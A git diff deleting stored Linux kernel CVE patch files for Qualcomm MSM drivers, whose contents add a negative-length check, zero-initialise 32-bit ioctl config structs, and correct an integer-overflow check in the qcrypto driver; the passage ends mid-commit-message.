diff --git a/Patches/Linux_CVEs/CVE-2016-6696/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6696/ANY/0001.patch
deleted file mode 100644
index 87463916..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6696/ANY/0001.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From c3c9341bfdf93606983f893a086cb33a487306e5 Mon Sep 17 00:00:00 2001
-From: Ashish Jain <ashishj@codeaurora.org>
-Date: Mon, 18 Jul 2016 16:07:42 +0530
-Subject: ASoC: msm: qdsp6v2: DAP: Update check to validate data length
-
-A big negative data length value can bypass the current check,
-update the condition to ensure that only valid data length is used
-to copy the params.
-
-CRs-Fixed: 1041130
-Change-Id: I6e1a58e901e4c042acfb0ab0a6223dec2949aefe
-Signed-off-by: Ashish Jain <ashishj@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c | 5 +++--
- 1 file changed, 3 insertions(+), 2 deletions(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-index 48180cf..ad2f2e9 100644
---- a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-+++ b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-@@ -1523,8 +1523,9 @@ static int msm_ds2_dap_get_param(u32 cmd, void *arg)
- 	}
- 
- 	/* Return if invalid length */
--	if (dolby_data->length >
--	       (DOLBY_MAX_LENGTH_INDIVIDUAL_PARAM - DOLBY_PARAM_PAYLOAD_SIZE)) {
-+	if ((dolby_data->length >
-+	      (DOLBY_MAX_LENGTH_INDIVIDUAL_PARAM - DOLBY_PARAM_PAYLOAD_SIZE)) ||
-+	      (dolby_data->length <= 0)) {
- 		pr_err("Invalid length %d", dolby_data->length);
- 		rc = -EINVAL;
- 		goto end;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6698/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-6698/3.10/0001.patch
deleted file mode 100644
index 8116c1e7..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6698/3.10/0001.patch
+++ /dev/null
@@ -1,253 +0,0 @@
-From de90beb76ad0b80da821c3b857dd30cd36319e61 Mon Sep 17 00:00:00 2001
-From: Laxminath Kasam <lkasam@codeaurora.org>
-Date: Mon, 29 Aug 2016 21:58:32 +0530
-Subject: misc: qcom: qdsp6v2: initialize config_32
-
-Not all memebers of config_32 are set before they are used which
-might lead to invalid values being passed and used. To fix this issue
-initialize all member variables of struct config_32 to 0 before
-assigning specific values individually.
-
-CRs-Fixed: 1058826
-Change-Id: Ifea3a6e8bf45481c65a4455ee64318304798fee2
-Signed-off-by: Laxminath Kasam <lkasam@codeaurora.org>
----
- drivers/misc/qcom/qdsp6v2/aac_in.c              | 4 +++-
- drivers/misc/qcom/qdsp6v2/amrnb_in.c            | 5 ++++-
- drivers/misc/qcom/qdsp6v2/amrwb_in.c            | 2 ++
- drivers/misc/qcom/qdsp6v2/audio_alac.c          | 4 +++-
- drivers/misc/qcom/qdsp6v2/audio_amrwbplus.c     | 6 +++++-
- drivers/misc/qcom/qdsp6v2/audio_ape.c           | 4 +++-
- drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c | 2 ++
- drivers/misc/qcom/qdsp6v2/audio_multi_aac.c     | 4 +++-
- drivers/misc/qcom/qdsp6v2/audio_utils_aio.c     | 1 +
- drivers/misc/qcom/qdsp6v2/audio_wmapro.c        | 4 +++-
- drivers/misc/qcom/qdsp6v2/evrc_in.c             | 4 +++-
- drivers/misc/qcom/qdsp6v2/qcelp_in.c            | 4 +++-
- 12 files changed, 35 insertions(+), 9 deletions(-)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/aac_in.c b/drivers/misc/qcom/qdsp6v2/aac_in.c
-index c9d5dbb..7176c114 100644
---- a/drivers/misc/qcom/qdsp6v2/aac_in.c
-+++ b/drivers/misc/qcom/qdsp6v2/aac_in.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2010-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2010-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -421,6 +421,8 @@ static long aac_in_compat_ioctl(struct file *file, unsigned int cmd,
- 		struct msm_audio_aac_enc_config cfg;
- 		struct msm_audio_aac_enc_config32 cfg_32;
- 
-+		memset(&cfg_32, 0, sizeof(cfg_32));
-+
- 		cmd = AUDIO_GET_AAC_ENC_CONFIG;
- 		rc = aac_in_ioctl_shared(file, cmd, &cfg);
- 		if (rc) {
-diff --git a/drivers/misc/qcom/qdsp6v2/amrnb_in.c b/drivers/misc/qcom/qdsp6v2/amrnb_in.c
-index eb92137..1bb441b 100644
---- a/drivers/misc/qcom/qdsp6v2/amrnb_in.c
-+++ b/drivers/misc/qcom/qdsp6v2/amrnb_in.c
-@@ -1,4 +1,5 @@
--/* Copyright (c) 2010-2012, 2014 The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2010-2012, 2014, 2016 The Linux Foundation.
-+ * All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -221,6 +222,8 @@ static long amrnb_in_compat_ioctl(struct file *file,
- 		struct msm_audio_amrnb_enc_config_v2 *amrnb_config;
- 		struct msm_audio_amrnb_enc_config_v2_32 amrnb_config_32;
- 
-+		memset(&amrnb_config_32, 0, sizeof(amrnb_config_32));
-+
- 		amrnb_config =
- 		(struct msm_audio_amrnb_enc_config_v2 *)audio->enc_cfg;
- 		amrnb_config_32.band_mode = amrnb_config->band_mode;
-diff --git a/drivers/misc/qcom/qdsp6v2/amrwb_in.c b/drivers/misc/qcom/qdsp6v2/amrwb_in.c
-index 9bd19d9..43dcbd5 100644
---- a/drivers/misc/qcom/qdsp6v2/amrwb_in.c
-+++ b/drivers/misc/qcom/qdsp6v2/amrwb_in.c
-@@ -217,6 +217,8 @@ static long amrwb_in_compat_ioctl(struct file *file,
- 		struct msm_audio_amrwb_enc_config *amrwb_config;
- 		struct msm_audio_amrwb_enc_config_32 amrwb_config_32;
- 
-+		memset(&amrwb_config_32, 0, sizeof(amrwb_config_32));
-+
- 		amrwb_config =
- 		(struct msm_audio_amrwb_enc_config *)audio->enc_cfg;
- 		amrwb_config_32.band_mode = amrwb_config->band_mode;
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_alac.c b/drivers/misc/qcom/qdsp6v2/audio_alac.c
-index eaae366..27d542c 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_alac.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_alac.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2015-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -202,6 +202,8 @@ static long audio_compat_ioctl(struct file *file, unsigned int cmd,
- 		struct msm_audio_alac_config *alac_config;
- 		struct msm_audio_alac_config_32 alac_config_32;
- 
-+		memset(&alac_config_32, 0, sizeof(alac_config_32));
-+
- 		alac_config = (struct msm_audio_alac_config *)audio->codec_cfg;
- 		alac_config_32.frameLength = alac_config->frameLength;
- 		alac_config_32.compatVersion =
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_amrwbplus.c b/drivers/misc/qcom/qdsp6v2/audio_amrwbplus.c
-index ec4d8f5..727a536 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_amrwbplus.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_amrwbplus.c
-@@ -2,7 +2,7 @@
-  *
-  * Copyright (C) 2008 Google, Inc.
-  * Copyright (C) 2008 HTC Corporation
-- * Copyright (c) 2010-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2010-2016, The Linux Foundation. All rights reserved.
-  *
-  * This software is licensed under the terms of the GNU General Public
-  * License version 2, as published by the Free Software Foundation, and
-@@ -205,6 +205,10 @@ static long audio_compat_ioctl(struct file *file, unsigned int cmd,
- 			struct msm_audio_amrwbplus_config_v2 *amrwbplus_config;
- 			struct msm_audio_amrwbplus_config_v2_32
- 						amrwbplus_config_32;
-+
-+			memset(&amrwbplus_config_32, 0,
-+					sizeof(amrwbplus_config_32));
-+
- 			amrwbplus_config =
- 				(struct msm_audio_amrwbplus_config_v2 *)
- 				audio->codec_cfg;
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_ape.c b/drivers/misc/qcom/qdsp6v2/audio_ape.c
-index 3ba7050..d7d550c 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_ape.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_ape.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2015-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -180,6 +180,8 @@ static long audio_compat_ioctl(struct file *file, unsigned int cmd,
- 		struct msm_audio_ape_config *ape_config;
- 		struct msm_audio_ape_config_32 ape_config_32;
- 
-+		memset(&ape_config_32, 0, sizeof(ape_config_32));
-+
- 		ape_config = (struct msm_audio_ape_config *)audio->codec_cfg;
- 		ape_config_32.compatibleVersion = ape_config->compatibleVersion;
- 		ape_config_32.compressionLevel =
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-index 6843fd7..940fd08 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-@@ -630,6 +630,8 @@ static long audio_effects_compat_ioctl(struct file *file, unsigned int cmd,
- 	case AUDIO_EFFECTS_GET_BUF_AVAIL32: {
- 		struct msm_hwacc_buf_avail32 buf_avail;
- 
-+		memset(&buf_avail, 0, sizeof(buf_avail));
-+
- 		buf_avail.input_num_avail = atomic_read(&effects->in_count);
- 		buf_avail.output_num_avail = atomic_read(&effects->out_count);
- 		pr_debug("%s: write buf avail: %d, read buf avail: %d\n",
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_multi_aac.c b/drivers/misc/qcom/qdsp6v2/audio_multi_aac.c
-index 52e9bdd..bad1cbb 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_multi_aac.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_multi_aac.c
-@@ -2,7 +2,7 @@
-  *
-  * Copyright (C) 2008 Google, Inc.
-  * Copyright (C) 2008 HTC Corporation
-- * Copyright (c) 2011-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2011-2016, The Linux Foundation. All rights reserved.
-  *
-  * This software is licensed under the terms of the GNU General Public
-  * License version 2, as published by the Free Software Foundation, and
-@@ -304,6 +304,8 @@ static long audio_compat_ioctl(struct file *file, unsigned int cmd,
- 		struct msm_audio_aac_config *aac_config;
- 		struct msm_audio_aac_config32 aac_config_32;
- 
-+		memset(&aac_config_32, 0, sizeof(aac_config_32));
-+
- 		aac_config = (struct msm_audio_aac_config *)audio->codec_cfg;
- 		aac_config_32.format = aac_config->format;
- 		aac_config_32.audio_object = aac_config->audio_object;
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-index 3e096fd..5196028 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-@@ -2071,6 +2071,7 @@ static long audio_aio_compat_ioctl(struct file *file, unsigned int cmd,
- 			audio->buf_cfg.frames_per_buf);
- 
- 		mutex_lock(&audio->lock);
-+		memset(&cfg_32, 0, sizeof(cfg_32));
- 		cfg_32.meta_info_enable = audio->buf_cfg.meta_info_enable;
- 		cfg_32.frames_per_buf = audio->buf_cfg.frames_per_buf;
- 		if (copy_to_user((void *)arg, &cfg_32,
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_wmapro.c b/drivers/misc/qcom/qdsp6v2/audio_wmapro.c
-index c323cb4..d37a578 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_wmapro.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_wmapro.c
-@@ -2,7 +2,7 @@
-  *
-  * Copyright (C) 2008 Google, Inc.
-  * Copyright (C) 2008 HTC Corporation
-- * Copyright (c) 2009-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2009-2016, The Linux Foundation. All rights reserved.
-  *
-  * This software is licensed under the terms of the GNU General Public
-  * License version 2, as published by the Free Software Foundation, and
-@@ -217,6 +217,8 @@ static long audio_compat_ioctl(struct file *file, unsigned int cmd,
- 		struct msm_audio_wmapro_config *wmapro_config;
- 		struct msm_audio_wmapro_config32 wmapro_config_32;
- 
-+		memset(&wmapro_config_32, 0, sizeof(wmapro_config_32));
-+
- 		wmapro_config =
- 			(struct msm_audio_wmapro_config *)audio->codec_cfg;
- 		wmapro_config_32.armdatareqthr = wmapro_config->armdatareqthr;
-diff --git a/drivers/misc/qcom/qdsp6v2/evrc_in.c b/drivers/misc/qcom/qdsp6v2/evrc_in.c
-index 2f931be..aab8e27 100644
---- a/drivers/misc/qcom/qdsp6v2/evrc_in.c
-+++ b/drivers/misc/qcom/qdsp6v2/evrc_in.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2010-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2010-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -224,6 +224,8 @@ static long evrc_in_compat_ioctl(struct file *file,
- 		struct msm_audio_evrc_enc_config32 cfg_32;
- 		struct msm_audio_evrc_enc_config *enc_cfg;
- 
-+		memset(&cfg_32, 0, sizeof(cfg_32));
-+
- 		enc_cfg = audio->enc_cfg;
- 		cfg_32.cdma_rate = enc_cfg->cdma_rate;
- 		cfg_32.min_bit_rate = enc_cfg->min_bit_rate;
-diff --git a/drivers/misc/qcom/qdsp6v2/qcelp_in.c b/drivers/misc/qcom/qdsp6v2/qcelp_in.c
-index b5d5ad1..aabf5d3 100644
---- a/drivers/misc/qcom/qdsp6v2/qcelp_in.c
-+++ b/drivers/misc/qcom/qdsp6v2/qcelp_in.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2010-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2010-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -225,6 +225,8 @@ static long qcelp_in_compat_ioctl(struct file *file,
- 		struct msm_audio_qcelp_enc_config32 cfg_32;
- 		struct msm_audio_qcelp_enc_config *enc_cfg;
- 
-+		memset(&cfg_32, 0, sizeof(cfg_32));
-+
- 		enc_cfg = (struct msm_audio_qcelp_enc_config *)audio->enc_cfg;
- 		cfg_32.cdma_rate = enc_cfg->cdma_rate;
- 		cfg_32.min_bit_rate = enc_cfg->min_bit_rate;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6698/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-6698/3.18/0002.patch
deleted file mode 100644
index 1195eb29..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6698/3.18/0002.patch
+++ /dev/null
@@ -1,213 +0,0 @@
-From 3baefa3af45c0ab1ca8391821ea55b9049a3a3da Mon Sep 17 00:00:00 2001
-From: Laxminath Kasam <lkasam@codeaurora.org>
-Date: Mon, 29 Aug 2016 21:58:32 +0530
-Subject: misc: qcom: qdsp6v2: initialize config_32
-
-Not all members of config_32 are set before they are used which
-might lead to invalid values being passed and used. To fix this
-issue initialize all member variables of struct config_32 to 0 before
-assigning specific values individually.
-
-CRs-Fixed: 1058826
-Change-Id: Ifea3a6e8bf45481c65a4455ee64318304798fee2
-Signed-off-by: Laxminath Kasam <lkasam@codeaurora.org>
----
- drivers/misc/qcom/qdsp6v2/aac_in.c              | 4 +++-
- drivers/misc/qcom/qdsp6v2/amrnb_in.c            | 4 +++-
- drivers/misc/qcom/qdsp6v2/amrwb_in.c            | 2 ++
- drivers/misc/qcom/qdsp6v2/audio_alac.c          | 2 ++
- drivers/misc/qcom/qdsp6v2/audio_amrwbplus.c     | 4 ++++
- drivers/misc/qcom/qdsp6v2/audio_ape.c           | 2 ++
- drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c | 2 ++
- drivers/misc/qcom/qdsp6v2/audio_multi_aac.c     | 2 ++
- drivers/misc/qcom/qdsp6v2/audio_utils_aio.c     | 1 +
- drivers/misc/qcom/qdsp6v2/audio_wmapro.c        | 2 ++
- drivers/misc/qcom/qdsp6v2/evrc_in.c             | 4 +++-
- drivers/misc/qcom/qdsp6v2/qcelp_in.c            | 4 +++-
- 12 files changed, 29 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/aac_in.c b/drivers/misc/qcom/qdsp6v2/aac_in.c
-index c9d5dbb..7176c114 100644
---- a/drivers/misc/qcom/qdsp6v2/aac_in.c
-+++ b/drivers/misc/qcom/qdsp6v2/aac_in.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2010-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2010-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -421,6 +421,8 @@ static long aac_in_compat_ioctl(struct file *file, unsigned int cmd,
- 		struct msm_audio_aac_enc_config cfg;
- 		struct msm_audio_aac_enc_config32 cfg_32;
- 
-+		memset(&cfg_32, 0, sizeof(cfg_32));
-+
- 		cmd = AUDIO_GET_AAC_ENC_CONFIG;
- 		rc = aac_in_ioctl_shared(file, cmd, &cfg);
- 		if (rc) {
-diff --git a/drivers/misc/qcom/qdsp6v2/amrnb_in.c b/drivers/misc/qcom/qdsp6v2/amrnb_in.c
-index eb92137..9d4cf5c 100644
---- a/drivers/misc/qcom/qdsp6v2/amrnb_in.c
-+++ b/drivers/misc/qcom/qdsp6v2/amrnb_in.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2010-2012, 2014 The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2010-2016 The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -221,6 +221,8 @@ static long amrnb_in_compat_ioctl(struct file *file,
- 		struct msm_audio_amrnb_enc_config_v2 *amrnb_config;
- 		struct msm_audio_amrnb_enc_config_v2_32 amrnb_config_32;
- 
-+		memset(&amrnb_config_32, 0, sizeof(amrnb_config_32));
-+
- 		amrnb_config =
- 		(struct msm_audio_amrnb_enc_config_v2 *)audio->enc_cfg;
- 		amrnb_config_32.band_mode = amrnb_config->band_mode;
-diff --git a/drivers/misc/qcom/qdsp6v2/amrwb_in.c b/drivers/misc/qcom/qdsp6v2/amrwb_in.c
-index 9bd19d9..43dcbd5 100644
---- a/drivers/misc/qcom/qdsp6v2/amrwb_in.c
-+++ b/drivers/misc/qcom/qdsp6v2/amrwb_in.c
-@@ -217,6 +217,8 @@ static long amrwb_in_compat_ioctl(struct file *file,
- 		struct msm_audio_amrwb_enc_config *amrwb_config;
- 		struct msm_audio_amrwb_enc_config_32 amrwb_config_32;
- 
-+		memset(&amrwb_config_32, 0, sizeof(amrwb_config_32));
-+
- 		amrwb_config =
- 		(struct msm_audio_amrwb_enc_config *)audio->enc_cfg;
- 		amrwb_config_32.band_mode = amrwb_config->band_mode;
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_alac.c b/drivers/misc/qcom/qdsp6v2/audio_alac.c
-index 7b18e3a..646d37d 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_alac.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_alac.c
-@@ -196,6 +196,8 @@ static long audio_compat_ioctl(struct file *file, unsigned int cmd,
- 		struct msm_audio_alac_config *alac_config;
- 		struct msm_audio_alac_config_32 alac_config_32;
- 
-+		memset(&alac_config_32, 0, sizeof(alac_config_32));
-+
- 		alac_config = (struct msm_audio_alac_config *)audio->codec_cfg;
- 		alac_config_32.frameLength = alac_config->frameLength;
- 		alac_config_32.compatVersion =
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_amrwbplus.c b/drivers/misc/qcom/qdsp6v2/audio_amrwbplus.c
-index e96e23a..3c3f1c4 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_amrwbplus.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_amrwbplus.c
-@@ -205,6 +205,10 @@ static long audio_compat_ioctl(struct file *file, unsigned int cmd,
- 			struct msm_audio_amrwbplus_config_v2 *amrwbplus_config;
- 			struct msm_audio_amrwbplus_config_v2_32
- 						amrwbplus_config_32;
-+
-+			memset(&amrwbplus_config_32, 0,
-+					sizeof(amrwbplus_config_32));
-+
- 			amrwbplus_config =
- 				(struct msm_audio_amrwbplus_config_v2 *)
- 				audio->codec_cfg;
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_ape.c b/drivers/misc/qcom/qdsp6v2/audio_ape.c
-index 8d78124..7371512 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_ape.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_ape.c
-@@ -180,6 +180,8 @@ static long audio_compat_ioctl(struct file *file, unsigned int cmd,
- 		struct msm_audio_ape_config *ape_config;
- 		struct msm_audio_ape_config_32 ape_config_32;
- 
-+		memset(&ape_config_32, 0, sizeof(ape_config_32));
-+
- 		ape_config = (struct msm_audio_ape_config *)audio->codec_cfg;
- 		ape_config_32.compatibleVersion = ape_config->compatibleVersion;
- 		ape_config_32.compressionLevel =
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-index 6843fd7..940fd08 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-@@ -630,6 +630,8 @@ static long audio_effects_compat_ioctl(struct file *file, unsigned int cmd,
- 	case AUDIO_EFFECTS_GET_BUF_AVAIL32: {
- 		struct msm_hwacc_buf_avail32 buf_avail;
- 
-+		memset(&buf_avail, 0, sizeof(buf_avail));
-+
- 		buf_avail.input_num_avail = atomic_read(&effects->in_count);
- 		buf_avail.output_num_avail = atomic_read(&effects->out_count);
- 		pr_debug("%s: write buf avail: %d, read buf avail: %d\n",
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_multi_aac.c b/drivers/misc/qcom/qdsp6v2/audio_multi_aac.c
-index 858f7bc..4ac74a5 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_multi_aac.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_multi_aac.c
-@@ -302,6 +302,8 @@ static long audio_compat_ioctl(struct file *file, unsigned int cmd,
- 		struct msm_audio_aac_config *aac_config;
- 		struct msm_audio_aac_config32 aac_config_32;
- 
-+		memset(&aac_config_32, 0, sizeof(aac_config_32));
-+
- 		aac_config = (struct msm_audio_aac_config *)audio->codec_cfg;
- 		aac_config_32.format = aac_config->format;
- 		aac_config_32.audio_object = aac_config->audio_object;
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-index 4edc814..2b0af2e 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-@@ -2038,6 +2038,7 @@ static long audio_aio_compat_ioctl(struct file *file, unsigned int cmd,
- 			audio->buf_cfg.frames_per_buf);
- 
- 		mutex_lock(&audio->lock);
-+		memset(&cfg_32, 0, sizeof(cfg_32));
- 		cfg_32.meta_info_enable = audio->buf_cfg.meta_info_enable;
- 		cfg_32.frames_per_buf = audio->buf_cfg.frames_per_buf;
- 		if (copy_to_user((void *)arg, &cfg_32,
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_wmapro.c b/drivers/misc/qcom/qdsp6v2/audio_wmapro.c
-index 2c88e77..d389d9b 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_wmapro.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_wmapro.c
-@@ -217,6 +217,8 @@ static long audio_compat_ioctl(struct file *file, unsigned int cmd,
- 		struct msm_audio_wmapro_config *wmapro_config;
- 		struct msm_audio_wmapro_config32 wmapro_config_32;
- 
-+		memset(&wmapro_config_32, 0, sizeof(wmapro_config_32));
-+
- 		wmapro_config =
- 			(struct msm_audio_wmapro_config *)audio->codec_cfg;
- 		wmapro_config_32.armdatareqthr = wmapro_config->armdatareqthr;
-diff --git a/drivers/misc/qcom/qdsp6v2/evrc_in.c b/drivers/misc/qcom/qdsp6v2/evrc_in.c
-index 2f931be..aab8e27 100644
---- a/drivers/misc/qcom/qdsp6v2/evrc_in.c
-+++ b/drivers/misc/qcom/qdsp6v2/evrc_in.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2010-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2010-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -224,6 +224,8 @@ static long evrc_in_compat_ioctl(struct file *file,
- 		struct msm_audio_evrc_enc_config32 cfg_32;
- 		struct msm_audio_evrc_enc_config *enc_cfg;
- 
-+		memset(&cfg_32, 0, sizeof(cfg_32));
-+
- 		enc_cfg = audio->enc_cfg;
- 		cfg_32.cdma_rate = enc_cfg->cdma_rate;
- 		cfg_32.min_bit_rate = enc_cfg->min_bit_rate;
-diff --git a/drivers/misc/qcom/qdsp6v2/qcelp_in.c b/drivers/misc/qcom/qdsp6v2/qcelp_in.c
-index b5d5ad1..aabf5d3 100644
---- a/drivers/misc/qcom/qdsp6v2/qcelp_in.c
-+++ b/drivers/misc/qcom/qdsp6v2/qcelp_in.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2010-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2010-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -225,6 +225,8 @@ static long qcelp_in_compat_ioctl(struct file *file,
- 		struct msm_audio_qcelp_enc_config32 cfg_32;
- 		struct msm_audio_qcelp_enc_config *enc_cfg;
- 
-+		memset(&cfg_32, 0, sizeof(cfg_32));
-+
- 		enc_cfg = (struct msm_audio_qcelp_enc_config *)audio->enc_cfg;
- 		cfg_32.cdma_rate = enc_cfg->cdma_rate;
- 		cfg_32.min_bit_rate = enc_cfg->min_bit_rate;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6725/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-6725/3.10/0001.patch
deleted file mode 100644
index 5444206f..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6725/3.10/0001.patch
+++ /dev/null
@@ -1,40 +0,0 @@
-From cc95d644ee8a043f2883d65dda20e16f95041de3 Mon Sep 17 00:00:00 2001
-From: Zhen Kong <zkong@codeaurora.org>
-Date: Tue, 16 Aug 2016 12:46:12 -0700
-Subject: msm: crypto: Fix integer over flow check in qcrypto driver
-
-Integer overflow check is invalid when ULONG_MAX is used,
-as ULONG_MAX has typeof 'unsigned long', while req->assoclen,
-req->crytlen, and qreq.ivsize are 'unsigned int'. Make change
-to use UINT_MAX instead of ULONG_MAX.
-
-CRs-fixed: 1050970
-Change-Id: I3782ea7ed2eaacdcad15b34e047a4699bf4f9e4f
-Signed-off-by: Zhen Kong <zkong@codeaurora.org>
----
- drivers/crypto/msm/qcrypto.c | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/crypto/msm/qcrypto.c b/drivers/crypto/msm/qcrypto.c
-index 40a4105..2d83304 100644
---- a/drivers/crypto/msm/qcrypto.c
-+++ b/drivers/crypto/msm/qcrypto.c
-@@ -1870,12 +1870,12 @@ static int _qcrypto_process_aead(struct  crypto_engine *pengine,
- 			 * include  assoicated data, ciphering data stream,
- 			 * generated MAC, and CCM padding.
- 			 */
--			if ((MAX_ALIGN_SIZE * 2 > ULONG_MAX - req->assoclen) ||
-+			if ((MAX_ALIGN_SIZE * 2 > UINT_MAX - req->assoclen) ||
- 				((MAX_ALIGN_SIZE * 2 + req->assoclen) >
--						ULONG_MAX - qreq.ivsize) ||
-+						UINT_MAX - qreq.ivsize) ||
- 				((MAX_ALIGN_SIZE * 2 + req->assoclen
- 					+ qreq.ivsize)
--						> ULONG_MAX - req->cryptlen)) {
-+						> UINT_MAX - req->cryptlen)) {
- 				pr_err("Integer overflow on aead req length.\n");
- 				return -EINVAL;
- 			}
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6725/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-6725/3.18/0002.patch
deleted file mode 100644
index 0aac1c13..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6725/3.18/0002.patch
+++ /dev/null
@@ -1,40 +0,0 @@
-From a8bfc6888280ac70c9c13b1802c1e962522714a4 Mon Sep 17 00:00:00 2001
-From: Zhen Kong <zkong@codeaurora.org>
-Date: Tue, 16 Aug 2016 12:46:12 -0700
-Subject: msm: crypto: Fix integer over flow check in qcrypto driver
-
-Integer overflow check is invalid when ULONG_MAX is used,
